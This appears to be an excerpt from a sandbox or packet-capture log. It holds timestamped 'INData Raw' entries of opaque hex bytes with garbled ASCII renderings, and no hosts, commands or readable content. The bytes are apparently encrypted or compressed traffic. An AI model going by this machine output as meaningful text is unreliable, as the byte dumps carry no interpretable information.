                                                                                                                  2023-08-03 15:59:56 UTC1289INData Raw: d7 97 0c a9 f6 69 3f 72 70 7a 62 2b 63 f2 9f c8 a2 b8 81 b7 20 5b 8f 48 7e 70 61 ba 47 62 3d 3f 9a c3 6d 17 18 d5 6d aa a6 c6 ca 2f 1b 0f 17 d0 8d b4 c5 3a 81 88 50 04 af 14 c2 e0 6b 44 c5 d5 8b 08 98 c4 e3 4e bb 79 06 11 91 e0 7f f8 bf e4 3f 73 6a bf 4e 23 e4 bb c8 7b 0a b3 65 3e 45 e2 2d 7c f1 dd 83 31 79 f1 71 22 f1 7e 96 27 15 ff 71 d9 82 37 f4 df 8a 16 4c 22 ec 5f 08 4a 78 e7 8c 14 c0 5a 8a 18 ef de a1 4c b8 80 07 44 f4 14 b8 98 91 91 23 9f 00 f3 b4 4e f9 92 8e 21 06 83 45 96 0a 2d 24 75 ea f8 75 b5 9a 5b cf 04 ec 08 d8 21 6a b7 ad b1 95 7c e5 8f d3 f0 1c 4b 37 e1 f7 b7 4e 8d ba 5c 34 64 1c d1 5b f8 83 5c 94 9d 5d a4 f3 97 00 f3 2c 0e 68 ef 68 aa 25 dd bc a0 a9 75 bf a4 b0 7b df af ab c5 e3 61 4f c2 e0 61 e1 d9 92 5e 68 2f 93 83 2a 1a 34 f8 86 6b 58
                                                                                                                  Data Ascii: i?rpzb+c [H~paGb=?mm/:PkDNy?sjN#{e>E-|1yq"~'q7L"_JxZLD#N!E-$uu[!j|K7N\4d[\],hh%u{aOa^h/*4kX
                                                                                                                  2023-08-03 15:59:56 UTC1305INData Raw: 02 06 42 57 86 5d 69 d5 a5 28 fe f0 9f 57 8c 1e 38 d0 b0 46 d2 13 4a 23 63 c8 9c 56 9e 1f 6c a9 e2 83 d1 ba d8 f9 d7 9a 76 bc 55 50 e7 fc fa 7a 2e b6 e2 b1 d3 aa 57 7b bc a9 8d f4 8d c7 ff 4c 68 90 e3 b2 ac e6 6b c3 71 4a bb 85 c4 d8 8b 55 09 ef 1c 72 7b 35 1d c9 0f f0 54 be 0e 67 cd c8 b0 37 58 5f b7 9b 9c f9 71 cc 4a ca 1e d7 4a 06 3b c8 93 2c ed f1 f6 28 0e 57 ba a2 bb 19 e0 0d 36 83 3c 9e c6 93 03 9b 20 28 66 f9 b9 00 50 df 79 90 ce cc d6 8f 24 23 a9 36 0a 0a e7 d2 a7 a0 00 cc 2a 50 c7 d6 e0 ed 39 eb ea f1 e7 b4 4e ed f5 4d 86 23 98 44 ac 44 1a 3d 65 2e 03 cb 67 9f c2 45 0d ff 5c 38 40 0a dd 9c 80 b8 14 5a dc f3 88 e9 a9 25 98 ae 9d f1 f9 40 66 b5 ce f5 23 f4 e5 62 de 5e 47 0a 67 a9 d4 ec 1f f2 ad 2d ab 7d c9 e8 36 40 e0 72 03 1c 54 92 b9 39 0d c1 49
                                                                                                                  Data Ascii: BW]i(W8FJ#cVlvUPz.W{LhkqJUr{5Tg7X_qJJ;,(W6< (fPy$#6*P9NM#DD=e.gE\8@Z%@f#b^Gg-}6@rT9I
                                                                                                                  2023-08-03 15:59:56 UTC1321INData Raw: b6 c7 04 7c 56 78 0f ce ad bc 85 42 f3 65 82 43 06 f6 0e 38 ed 2b fd 25 97 e1 67 97 92 aa a7 f9 f2 c3 96 d0 ce 8b 03 d4 10 d4 9f 0f eb aa cd 3e 17 b4 e9 2f 9e 0a 6f 01 0b ef 0c 39 d1 05 ef 46 a7 a1 e3 f6 8c 39 0a c6 91 72 87 70 e4 2c 6a 5c 4c c7 50 78 d5 43 98 f8 b9 26 76 6b 1e ee bc 9f 1c 0f 6b 17 9e 88 8b 10 38 98 6c 7a dc 38 54 a7 18 a2 07 5d 2b 72 63 11 13 dc f1 21 2f 2a ec 5f b3 f8 a6 04 9a b2 3c 74 2d 37 3b 11 ef c7 53 73 7e 07 3c 01 8f 21 3c 8e ae 69 25 5e 5a 0a 06 02 9c 46 fb 76 a6 40 9b 11 b2 b0 45 30 19 79 f1 16 42 50 61 99 cb a1 51 cd 1a 81 91 1d ec d1 24 9b e0 af e7 28 08 28 e4 c4 b1 dc 53 62 56 1a ab 2b 32 a5 3f 2b ea 45 27 34 91 32 dc 02 af 3a bd 3e 12 36 06 25 54 0c 68 36 cb 62 ce 2f d9 02 f0 70 3d d2 bc 58 34 af 03 1d f0 d2 a3 0f 79 e9 43
                                                                                                                  Data Ascii: |VxBeC8+%g>/o9F9rp,j\LPxC&vkk8lz8T]+rc!/*_<t-7;Ss~<!<i%^ZFv@E0yBPaQ$((SbV+2?+E'42:>6%Th6b/p=X4yC
                                                                                                                  2023-08-03 15:59:56 UTC1337INData Raw: 2d 9d af 23 b1 3b 88 da 6b f0 54 83 2e 64 cd 44 46 53 69 4c 2c d7 f4 5c 4a be 80 a3 6c e4 26 dd 28 fe c1 9d ef 81 7b 12 4b 12 87 05 b0 0c 91 94 1c 3a fd 0d 3b 69 c3 61 c6 04 d5 ac b3 ef d8 a9 75 5f 8d 9f a6 3d a5 82 27 8b 5d 23 40 b6 bc 74 65 9c 47 3a 7b 17 eb a2 3a 4c 13 46 8a d6 66 3a ca 3d b2 7b f9 73 8e 5a 98 f2 e2 d4 2d 14 01 bf 7e 29 99 08 4b 19 f3 3b 67 63 56 7b 4e 27 2f fb 7c fe 2c 10 55 42 77 4f 72 2d 8e f1 fe 41 eb 20 b7 5c e0 b2 7d e3 2b 86 4b b2 e5 70 b3 1b 68 70 4b 04 80 39 01 4c ad 2a 1c b1 2d ab 17 c5 63 43 49 56 e5 fb 48 6e 6a 36 7d f2 c6 80 f8 3e 81 7c 9f b8 27 b6 f7 4c 6c 61 45 cf 17 df 67 78 64 df 81 0d a6 d9 e7 ad 5c ab 73 1c 94 1c 7f 8c 5d ef 2c cb cf 93 26 b7 e3 d1 42 e1 49 03 4f 4e 28 1d 95 7b 0b 38 d7 f1 75 2d 36 87 e6 e6 2d 6d d9
                                                                                                                  Data Ascii: -#;kT.dDFSiL,\Jl&({K:;iau_=']#@teG:{:LFf:={sZ-~)K;gcV{N'/|,UBwOr-A \}+KphpK9L*-cCIVHnj6}>|'LlaEgxd\s],&BION({8u-6-m
                                                                                                                  2023-08-03 15:59:56 UTC1353INData Raw: de e9 b8 81 56 42 b1 e1 3b 74 4c cc 00 9d 64 0c 55 ab 53 7e 3f 0d 1b 55 c6 90 4c b3 d0 54 5b 7e 85 78 75 ea cb 9d 05 a4 3d 31 ea 50 55 bd 2c 9f 37 a7 d4 6b 07 fb a3 88 07 a1 b7 b1 39 75 26 5d 68 04 97 b5 a7 5e dc 18 25 c6 00 ca 96 f7 cf 1a 2f 9e 0f 53 ad ad e4 6d ae 9d 68 58 45 a6 a5 9a ba be dc e0 a6 9c f6 1d fa 1d 0e b3 df 5d cc 9f 2d d4 56 60 6a 7f 57 48 bf d8 42 1f 40 8a 14 f6 78 e6 ef c9 38 c8 0a ea 84 67 58 4f 5d ca 37 b3 e4 33 7f 65 ab 59 f6 b3 b1 07 ed d8 2c bb e4 5a 98 60 a1 6d 5f 8b 0e 31 51 c9 f2 b2 3d 1a 47 17 a0 e9 df 7a 4e 5c 9d d5 80 83 1c f6 23 87 f7 b9 78 33 fa 7b 20 e6 ef 8c 76 2b 4e 64 52 a3 5b 99 a9 86 6d 49 06 ac d8 08 10 9c c8 a7 c0 51 d7 c0 54 96 e5 39 6c ae c0 89 01 e7 83 ca 2e 1b 64 6a 42 1c 90 11 0d 2f 0f e0 e9 12 53 b8 62 b7 8e
                                                                                                                  Data Ascii: VB;tLdUS~?ULT[~xu=1PU,7k9u&]h^%/SmhXE]-V`jWHB@x8gXO]73eY,Z`m_1Q=GzN\#x3{ v+NdR[mIQT9l.djB/Sb
                                                                                                                  2023-08-03 15:59:56 UTC1369INData Raw: d8 00 79 a6 c7 8b 16 21 12 84 2b a6 c7 d0 37 e5 f9 fa 54 a8 ad 9f da cc 60 6e 1f ad 2a ed 79 81 44 28 1a ea 61 df 2d 0a 0f b0 ea f8 b6 fb 91 07 1e 2e 45 e6 79 21 55 ac 64 f0 f5 a1 83 1c c4 65 36 d9 8f c6 98 b1 ac 43 a6 2f 4e 53 8e 36 7e 28 36 26 e5 0e e1 41 b6 f3 8f 13 23 29 d5 a6 f6 ab 07 c6 b7 94 52 fe 6a bf 1d 8b fd ef bf 01 10 4c 3b bb 09 97 b0 cb 3a 01 76 86 b5 98 3a d0 20 d7 fd ec a3 bf f7 68 ec e3 d2 55 d4 2e a2 e6 a0 67 54 bd dc 8e ae ec 10 64 53 46 5e 39 e3 4d 43 cf aa 9d b8 b4 39 23 19 22 00 70 85 c4 69 82 27 c4 d8 06 b9 c6 af bc 71 06 8d 4c 78 ba b8 79 50 9a 03 3c 89 35 5f aa 6e 8e 38 21 6c a8 11 56 3e 05 8f 85 be 4d ba 30 08 e7 28 78 17 c6 29 03 d1 fb 66 16 55 60 da 5f 26 46 fe 69 67 3b ba 14 57 1d c2 f9 6f cf 33 bd 80 89 04 64 b2 6b 51 57 b6
                                                                                                                  Data Ascii: y!+7T`n*yD(a-.Ey!Ude6C/NS6~(6&A#)RjL;:v: hU.gTdSF^9MC9#"pi'qLxyP<5_n8!lV>M0(x)fU`_&Fig;Wo3dkQW
                                                                                                                  2023-08-03 15:59:56 UTC1385INData Raw: b7 94 8f 0c 72 20 5c f1 cd 9b cd 92 b8 52 9c 7e 26 5f d2 e5 ab 0b cc 09 e0 2a 96 e2 1b 92 5f e1 67 56 62 c9 59 f5 25 2e 93 c8 1c 44 f6 32 a4 e0 20 8b bb cc ac 69 6a 58 33 df 53 bb 48 f1 fc 16 6c ea 0a 88 9c 54 51 0f 61 49 80 c3 c5 38 61 3e 9e a7 f7 69 19 ad 62 10 59 57 44 30 92 79 68 08 67 68 b2 70 f8 e8 c9 52 7d a6 4b a0 79 db 05 63 f3 1c ea 59 83 e7 59 9f a1 5d 46 4a 89 4a e4 9b bc 43 1d 40 3a ea 58 57 20 ec 80 1a 94 bd e5 bf 32 74 63 60 04 4b 89 fb 98 76 f9 f0 a1 53 9b 3f 74 bc 29 64 47 86 c7 1f 82 9c fb c9 ed d8 4e d5 40 ca 2f ed ca b7 9c 7d 86 1f 9c 12 9b 9c 4b 07 b3 84 a1 7e 3d cc 0e 3b 67 d4 a3 f8 e9 b2 34 ba c9 8b 7b f7 6e 3e 43 92 c2 d8 44 28 81 7d 32 c1 0b 44 62 28 56 0c 7a a7 45 f8 ce 2d 8f 92 21 e2 e6 b0 8d 2f bf a2 13 c0 75 11 30 68 8f 8d 11
                                                                                                                  Data Ascii: r \R~&_*_gVbY%.D2 ijX3SHlTQaI8a>ibYWD0yhghpR}KycYY]FJJC@:XW 2tc`KvS?t)dGN@/}K~=;g4{n>CD(}2Db(VzE-!/u0h
                                                                                                                  2023-08-03 15:59:56 UTC1401INData Raw: 48 a3 58 13 8c 31 ed f3 56 d3 8a 58 99 39 07 06 f4 ea ce 10 94 94 66 8b 31 84 da 13 83 f9 8c bf 3e 85 4e 05 a1 cd 80 f4 2b 81 1d b7 0a f0 d7 b3 3c cb dd f5 56 e9 f7 91 2d 71 12 19 bf c7 db 96 23 cb 70 c4 97 e2 1f ff d1 17 ef 20 02 11 8e 29 ed 59 a8 dd de c2 09 f0 55 cc af 7e b9 1a f4 de 65 d1 fd d4 b8 a6 62 d8 18 2c 21 ad a1 44 95 83 c3 8b 7f 6c 08 2f 20 e0 2e b3 49 31 c4 ab 3d dd 51 06 f8 80 7f 6d 02 a0 3c f6 a6 8e a0 2e 86 d7 15 4a db d7 c5 26 82 db d1 ee 3d e1 ed a3 64 9c 6b 7f 39 fc 88 bf d8 76 a9 aa 2a ba be 07 cc 3c 37 a8 b1 6f 6f 91 43 5b 1a 60 51 39 b0 56 a0 d3 02 3e 66 e4 2d 61 40 7a 4a a0 80 51 7e 71 17 ea cb 6b f6 2d 3b 3a 46 1a 71 81 8d ab 81 1a 72 f8 dc 2d 17 d8 0d bf 21 9f 6c c6 9f df ec c9 b6 41 67 c0 ed 26 e6 40 84 7c 7f 0d 6d 14 46 22 fb
                                                                                                                  Data Ascii: HX1VX9f1>N+<V-q#p )YU~eb,!Dl/ .I1=Qm<.J&=dk9v*<7ooC[`Q9V>f-a@zJQ~qk-;:Fqr-!lAg&@|mF"
                                                                                                                  2023-08-03 15:59:56 UTC1417INData Raw: 3c 3f 19 cb 5f 84 9c d6 7d 6a 35 8d 16 60 f5 12 d9 04 e1 e2 49 49 d3 f7 0d f0 2e 33 b5 2e 43 28 26 97 1e 4c a6 1f d8 4c fb fe 5f 99 a4 b9 26 6e db cc b8 4d 42 93 09 c4 2d 96 22 00 63 f9 53 96 51 ae 93 56 69 70 37 48 b3 7e 32 09 4a a1 9c 33 6c c2 af 15 64 f0 89 73 09 b9 6b 9d 08 23 22 7e 1f 81 16 3a 12 10 90 95 98 6f 4d a0 de 29 0a 23 fa 34 5c ff fe 3e d4 84 26 ff 13 66 5d e8 bb 80 20 d3 6c 17 11 1c 3c d2 4f cd 42 d5 8f 7f dc a4 d8 5e f4 97 2f a2 bf 69 a9 5e d1 05 f2 be 49 2a c4 fb 06 19 78 13 fb 1a d3 09 f7 0a 9c e7 e0 6e 11 e6 96 2f 90 f5 1e 3c dd cd 45 1b d2 49 d3 b6 e7 24 4b 54 c5 23 ad af 52 ca a8 38 ea 83 c3 88 6a 6c 81 a3 56 dc 84 98 fc 71 17 e8 a0 e9 b2 45 17 d9 de 24 0c 9a 81 48 cb 14 82 72 35 84 db af d7 ff 2b fe 55 f1 65 5d e1 02 0b 9e 80 4f 52
                                                                                                                  Data Ascii: <?_}j5`II.3.C(&LL_&nMB-"cSQVip7H~2J3ldsk#"~:oM)#4\>&f] l<OB^/i^I*xn/<EI$KT#R8jlVqE$Hr5+Ue]OR
                                                                                                                  2023-08-03 15:59:56 UTC1433INData Raw: 50 cd 22 1e 62 4b f0 37 08 b0 8a 89 e6 7d 32 3b 94 6f 37 0e 85 f7 3d c1 12 ca bc b5 1a ea af ba 88 ec dc c0 9e d0 a5 2d 17 5b ef d3 2d 45 f5 cc 2e 5a 64 5a 2a 2e a6 db 3c f9 86 55 6a 89 54 26 94 ec 22 e7 0e 9d 39 5d 54 e6 67 33 62 9f 44 1e 6a 18 99 29 ea 49 90 0d 19 42 ac c3 38 7e 9a 3e 8c a2 41 11 df 31 50 2e 07 40 24 66 01 11 4c c6 56 3b 30 98 7b 81 09 cf 92 9a 55 c5 95 1b 4b d0 49 41 9d 75 4c 25 46 bf 7b 62 4a 5f 59 a2 b2 ea 8c b7 bb bd ec 58 40 ec eb 9f 6a c0 ae 01 2e 47 ae be f7 4a 2e db 7d 31 87 bf 2e 86 39 32 85 33 c6 a1 38 15 ea c7 64 66 c6 6e 44 6b 7d b8 ca 67 05 c3 62 a6 0d 28 44 57 2d cf 2e d7 db 7e b0 3a b3 3d 01 3a ec 70 c8 8a ce cf 6a 39 a6 3b 40 03 21 1f b9 2d be a2 91 9f 1e 45 18 34 82 38 a5 ac d0 ce ba 69 cc d5 56 d3 ac f6 a4 0c 7b be ed
                                                                                                                  Data Ascii: P"bK7}2;o7=-[-E.ZdZ*.<UjT&"9]Tg3bDj)IB8~>A1P.@$fLV;0{UKIAuL%F{bJ_YX@j.GJ.}1.9238dfnDk}gb(DW-.~:=:pj9;@!-E48iV{
                                                                                                                  2023-08-03 15:59:56 UTC1449INData Raw: 75 6b be 63 53 20 7f b9 ea 7b ab 4a e0 59 3c 31 9c 28 1a 2a bc df 2c 4f 90 be 96 96 69 7c e7 cf b6 6f 2f 6f f1 05 f9 b9 bb 47 fc d6 16 17 3f be f9 dc 1b af 56 1b 0d 69 b1 08 a3 60 78 f4 4f 2e 20 b9 c9 0c 10 fe 69 c7 33 fe fe 0d e5 e0 6d d3 64 00 8a 5e fd 7f 06 8d e2 02 2d 59 17 ab 5e ba 66 3a 25 3d bf 55 34 73 31 81 bd 4d 73 8a eb a9 87 61 f1 4a 0d a9 2d c8 41 7e bc 08 e4 c6 e0 da 84 8b 04 0e 50 af 12 36 8d 99 36 31 ec ae e5 8e 73 01 a8 42 15 7c 21 23 ce 00 2b 7f e3 27 40 3b da 77 70 3d 12 1a 92 15 1d fd f6 85 20 f8 d7 cb 12 b4 8f 4b 62 d7 27 93 3a 52 ab 2f 84 06 47 8e 6e 70 be 73 37 f1 ad d6 32 b6 68 a0 5b 44 fc 29 9a 55 e2 5d 01 78 c5 67 e4 92 69 53 14 46 3c d6 31 5e 26 fa 12 cf f8 9c f4 4c 53 31 5d ea bd d6 45 28 9e d0 ce 15 22 86 b6 c7 5e 38 9d 00 34
                                                                                                                  Data Ascii: ukcS {JY<1(*,Oi|o/oG?Vi`xO. i3md^-Y^f:%=U4s1MsaJ-A~P661sB|!#+'@;wp= Kb':R/Gnps72h[D)U]xgiSF<1^&LS1]E("^84
                                                                                                                  2023-08-03 15:59:56 UTC1465INData Raw: 70 cb 75 54 22 82 f8 78 ac fd 3f 01 56 8b 53 f7 f0 46 28 89 da 6f f0 8e 26 62 23 91 1b a6 63 b8 aa 7f f6 1c da 55 44 11 64 73 83 25 a4 83 41 ae cb 4a 2b ae 1d 9c fd ed c7 ce 7f 30 56 a6 6e e0 86 c6 75 49 35 05 23 f3 f0 f8 80 08 78 7a d9 f3 f1 9c b3 85 ff 61 9f ef 5e e0 27 d1 da 6f 41 8b 8f 30 53 16 99 58 73 ee 16 a3 c6 8c 16 a2 c6 7f 72 80 55 6e f4 46 1e 48 b3 9d e3 0c b9 d3 b3 d3 83 23 c0 0d 0e 82 bc c3 22 3b 15 c8 7a 23 92 73 68 92 fc 6d 3d 69 09 98 29 cf 77 c5 cd 14 46 16 0c 81 09 9f 7d 19 3c 8d 9a ac 2e 04 b4 35 57 fd 4e 0e 94 eb ae a8 74 2d ae ba 0b 6c af 56 71 06 97 05 af 6d fa f9 c0 11 79 73 b5 f4 58 2b d4 ae 42 71 bf 20 ae c7 b3 36 35 8a b5 f0 14 48 df b9 1f c8 a9 d2 12 40 43 cd 1b 2c c5 fd 3f e6 cc 86 7b 59 01 c7 a9 54 3f 32 5f d7 4b 21 25 94 b0
                                                                                                                  Data Ascii: puT"x?VSF(o&b#cUDds%AJ+0VnuI5#xza^'oA0SXsrUnFH#";z#shm=i)wF}<.5WNt-lVqmysX+Bq 65H@C,?{YT?2_K!%
                                                                                                                  2023-08-03 15:59:56 UTC1481INData Raw: c7 7d 80 17 61 ad 1f 9b bc fb 3b 35 af 53 f4 f9 8e a1 dd a8 e1 4e d8 bd 08 fb 75 c8 b4 f9 ec ed 23 c8 d8 b5 76 e4 17 e1 47 fc 8a 5c df 24 1d ce a1 cd 0e 45 c2 52 9a 7a 47 98 83 b4 0f c3 5b ba d2 47 c5 0a 19 17 a7 bb 6b 7f 63 7e f5 c3 7d d4 60 73 52 d2 ff 12 ea f0 56 89 56 31 12 d8 88 6a 05 b9 87 da 0e 5a b3 91 b4 22 f1 d8 bc a9 3f ef fb d4 a5 18 33 28 60 b9 4b aa be 85 19 d1 3e 2e bc 89 be ae 77 6d c2 77 0a a1 ef db 1d a1 27 cd e7 da 59 b3 be 0d 93 75 82 7e 61 9b d3 a2 74 4a b9 86 52 df 23 c5 11 88 6e 0a 28 14 1b 8d f7 53 f9 42 d4 ce f4 15 86 f1 51 01 69 c2 86 da 21 2b e3 ce 25 6e 04 4d 6a 07 b6 1d 75 f4 78 df d4 f0 78 17 7d d3 e2 3c 91 85 e1 da e5 80 a7 76 6e 5a 45 15 80 b8 11 83 8f 2d 15 60 31 8c bd 40 96 b7 cd 78 70 7a e3 c5 25 6b 0b 8c 6e cf c1 34 90
                                                                                                                  Data Ascii: }a;5SNu#vG\$ERzG[Gkc~}`sRVV1jZ"?3(`K>.wmw'Yu~atJR#n(SBQi!+%nMjuxx}<vnZE-`1@xpz%kn4
                                                                                                                  2023-08-03 15:59:56 UTC1497INData Raw: 9e e1 7a 96 f2 e0 6c 85 7d 7c af 17 50 4b c0 7e aa af a2 fc 7d 1e 16 dd 4f b1 33 43 d2 a4 1f 29 c8 69 66 09 7f aa f0 1d c6 36 81 6a 08 7a f4 f0 5b af d7 a6 0a 4d 6c 4e db 9a 2b 60 25 7f 2d 4f eb 0e aa 66 4e 0f fa 1c 02 be 41 c7 08 0c d1 63 81 7a 72 4b 3e 95 ca c2 bc 91 dd e7 82 fa ec e2 0d 55 92 95 09 a6 29 37 5d dc 01 2d 9a 73 c1 75 c6 a1 ba 63 66 18 ec be 68 19 2f 88 15 40 79 82 bd f1 8c a8 e9 7a 61 92 0d c0 d7 09 00 9a 47 68 89 0c 27 9f 43 d3 82 a5 92 4a be 4c 7f 54 0f bd 1d bc 6d 49 19 f0 70 1a cc f5 66 ea 44 7f d4 c3 fa 96 68 b6 0e f3 09 a7 d1 ff 88 29 36 97 30 dc 1d aa fe bb 8f 87 c6 83 be 75 db 23 e6 3a 1c 7e c5 47 50 d5 ff 5c 53 7e 06 b2 a5 c9 2c eb 5c 1c bf a7 be 5b e4 b2 21 82 99 34 12 65 56 fc bb 8c f7 0d ad 77 b1 8b 51 89 28 d7 a1 ab 0e c4 49
                                                                                                                  Data Ascii: zl}|PK~}O3C)if6jz[MlN+`%-OfNAczrK>U)7]-sucfh/@yzaGh'CJLTmIpfDh)60u#:~GP\S~,\[!4eVwQ(I
                                                                                                                  2023-08-03 15:59:56 UTC1513INData Raw: 3a 23 ca e9 17 94 03 86 7a ec 84 82 79 10 fc 4c bf 6d bc 37 b4 de b1 92 45 c3 8f 0e 44 28 d3 ed 60 20 78 80 28 91 6f 05 96 f6 62 91 70 a8 73 96 b0 b9 2b dc d3 5a 4c 46 3c 94 c5 aa 42 34 c1 23 c3 93 41 c8 38 bb 54 8b ec d6 10 1e 46 55 bd 79 14 cf c7 60 71 39 04 bd ef 00 41 22 33 4c 48 81 e1 ff 46 92 01 5e a2 35 c4 1b cc cc 0c 82 b0 0e 2b bb 6d 2f f1 e8 25 ac d8 c5 43 68 30 8e b8 de 11 8a b0 95 3e 92 89 71 93 ad f1 77 42 f6 8e f1 d3 de b4 f3 7f 63 f5 0b 53 77 ef 13 35 58 85 4c 3b 65 29 aa 83 18 83 20 55 7b 4c f7 be 2d 3e ff cc 5a af c1 25 5e e0 20 3a dc 08 f7 10 1e c8 b7 78 a3 9d 13 a9 a4 23 14 92 4e f6 c7 e2 09 a8 d2 dd 12 6f cb a3 36 e9 84 e4 d2 36 8e 17 20 f8 9f c7 28 8e 54 6d 3c d6 35 ad a7 7a 85 6f e0 22 7f 30 99 9b db 09 5e 0f b0 21 d2 0a ea 09 ad 1b
                                                                                                                  Data Ascii: :#zyLm7ED(` x(obps+ZLF<B4#A8TFUy`q9A"3LHF^5+m/%Ch0>qwBcSw5XL;e) U{L->Z%^ :x#No66 (Tm<5zo"0^!
                                                                                                                  2023-08-03 15:59:56 UTC1529INData Raw: 73 d1 3f e0 c1 45 e7 86 dc 5d f0 e0 f6 d5 74 9b e4 fe b5 96 a8 db b5 af 61 6f 7c 61 60 a6 e9 2d e1 3e d0 a8 73 81 d8 65 68 58 7d 66 94 6f 0e 63 80 e7 4e 91 b9 3e 3a 82 c8 ad 40 23 41 e4 80 34 ad 22 7f ee 3f 46 ef 2e b3 f6 48 53 95 de c5 c2 ad 62 68 91 75 f1 e6 5d 29 b5 77 ab a6 43 37 7a 7e 4f 5d da f4 5b e4 15 1a 26 ff 9b 02 f4 33 9c b5 bd 82 d7 48 07 ec 9d 7b 3c f6 29 7c fb 71 a0 43 90 92 00 6e 23 c7 2b 86 e6 ac 8e dc 2a dc 03 8c 05 c4 bc a4 f6 13 9b 85 c5 08 7a f6 80 49 a7 59 07 92 28 55 56 68 a9 d0 57 c3 a5 94 85 e4 32 b7 9a da 03 ea 3f 63 0b 4a 93 51 5f 56 f4 b6 cc 25 87 99 08 ea f2 fa 97 67 82 54 74 85 90 56 59 0b dd 3b 60 24 7c 77 07 87 f5 b0 7e b0 de fb 6e 37 dc 90 50 be 4e 47 7b c3 7f b0 c1 d6 7f 7f eb 45 16 65 6c 16 37 a0 bd 2e 6e 0d 32 73 18 3e
                                                                                                                  Data Ascii: s?E]tao|a`->sehX}focN>:@#A4"?F.HSbhu])wC7z~O][&3H{<)|qCn#+*zIY(UVhW2?cJQ_V%gTtVY;`$|w~n7PNG{Eel7.n2s>
                                                                                                                  2023-08-03 15:59:56 UTC1545INData Raw: b6 95 fc 4b 9a bd 8f a4 6f 2f 39 8b 60 b2 cc 03 5a 08 73 fb 3f cc e9 d8 64 f8 51 76 85 e7 0a a1 3c 31 b1 f8 14 ba 12 d2 cd 33 d7 40 68 6b 78 3a 2a ba 67 f8 63 e2 27 0d 4f 66 3a 4c d1 2e 06 75 2e b3 6c 54 ac 09 07 0f 50 40 50 c0 68 4b 63 04 b9 86 b4 43 d2 4b f4 2b 08 17 65 6a c5 7f bc 7d 3f b7 7a b8 1a fe 57 46 91 31 46 60 24 b6 a6 00 66 4c be 9b 48 f7 49 25 bd 0e 5e 5c cb 4b 86 a1 e2 5b 84 a6 67 ab f7 13 f2 d5 62 03 5e b6 98 8f 54 da 2a 16 ee 73 eb a4 06 b7 c1 bf 2d dd 4f 4b ee bd b1 01 aa 73 8e 29 0d e0 a9 12 e7 05 34 ae 5b 0a 02 3f c7 8d 46 09 af c0 6b 40 0d f5 12 df 3a 10 4f 8d 13 b8 37 2a 08 28 ca c6 84 46 f8 a5 35 d9 1e ba 31 77 c8 52 c5 5a cc ea 59 6b cc e5 ef 68 7e 18 6e fa bc 90 86 93 c0 9a 3b d8 0d 80 5d 31 9e 58 a7 50 18 8b d3 60 e6 9d 2b d6 1e
                                                                                                                  Data Ascii: Ko/9`Zs?dQv<13@hkx:*gc'Of:L.u.lTP@PhKcCK+ej}?zWF1F`$fLHI%^\K[gb^T*s-OKs)4[?Fk@:O7*(F51wRZYkh~n;]1XP`+
                                                                                                                  2023-08-03 15:59:56 UTC1561INData Raw: 31 cd 89 d2 32 a7 b8 9b fc 8b 4a 63 b9 9c e2 1a 7d a1 d9 f5 34 4c 76 1f 21 f3 d4 43 80 80 7e b5 68 88 f6 48 14 dc d8 e2 a4 78 fd ff 24 5f ac 18 0e 4d bd cb 8c a5 c5 02 21 ef f9 df c5 8f a8 60 a7 16 97 fb 3d f1 bb e4 36 3e b0 bd e5 71 1d d9 17 4f 93 55 68 8c bc 79 3c 7c 37 23 05 81 94 0e c9 a1 d1 fc 5e 67 18 ab 21 ce 53 fc 82 2c e7 d6 8f a2 d3 e1 01 4b 7e e6 db 38 1f 61 c2 39 4a ad 79 cf 1c f8 94 f1 0a 08 b8 4e f9 11 3c 3a 46 c6 d0 05 ca 16 5a 3a 0e 08 e8 58 bd 8d fa 56 39 9c 0a c0 4c 28 26 4e ef e0 eb bf 48 5a 5f e4 3b cf 9c 7c d0 50 c1 29 a9 2b bf 53 0f 98 1e 9d db 82 25 c8 df e4 bb e5 9c 2b 4b 4e 79 23 f1 38 69 e5 0f 9f 66 6d da df 94 4f be 0d 61 ed e6 ef 03 55 00 d3 64 61 f7 e8 3e 11 45 eb 22 c7 1f 13 3e e3 dd 50 28 16 26 d9 7f 0a a2 d2 f8 da 10 a5 07
                                                                                                                  Data Ascii: 12Jc}4Lv!C~hHx$_M!`=6>qOUhy<|7#^g!S,K~8a9JyN<:FZ:XV9L(&NHZ_;|P)+S%+KNy#8ifmOaUda>E">P(&
                                                                                                                  2023-08-03 15:59:56 UTC1577INData Raw: 95 c5 d1 a8 ac e9 d7 e0 b0 93 11 1e 06 e1 22 7e 77 ad c8 f0 bf 7d b9 d8 ea 60 36 63 c7 25 48 79 fe b4 9c 87 84 26 51 41 08 b0 0d 2c ce 4e f4 73 90 77 a0 0c 37 3a c2 3a ef 88 72 1d 57 33 2a 33 a9 8a 51 65 68 9c 50 8b 42 65 dc 88 93 1d ac 85 4d 8f 79 d7 63 b4 87 05 85 6b 25 ef d5 bb 88 b4 df 5a 89 f4 2e 3d 65 44 de 3e 11 39 7d 2e 09 fe 5b 42 0d 56 e2 aa 5c 47 5d fb f4 77 a3 67 bd 8c 61 8a da db 69 8c 47 26 8e 07 b1 bf d7 bf 8f eb 4b c1 36 c3 e3 47 4d 77 d9 16 51 dc 73 38 90 c2 31 e4 16 90 a0 6a ab 3e dc 95 2c 4a 3f 7c 36 65 97 86 92 ed e8 ed f9 36 b3 05 76 f1 45 a8 5e 33 94 51 59 32 8f 8f 18 9d 33 05 cc 8b fa 26 3c 86 a1 da 4b 54 6d 9c 21 c2 5d 57 95 3e 18 75 43 1b 50 d7 fe 54 17 85 1f a5 38 e1 cc 31 fa 2d b1 2a 72 41 54 cd 4a ab 90 4b 45 f8 77 28 50 c1 1c
                                                                                                                  Data Ascii: "~w}`6c%Hy&QA,Nsw7::rW3*3QehPBeMyck%Z.=eD>9}.[BV\G]wgaiG&K6GMwQs81j>,J?|6e6vE^3QY23&<KTm!]W>uCPT81-*rATJKEw(P
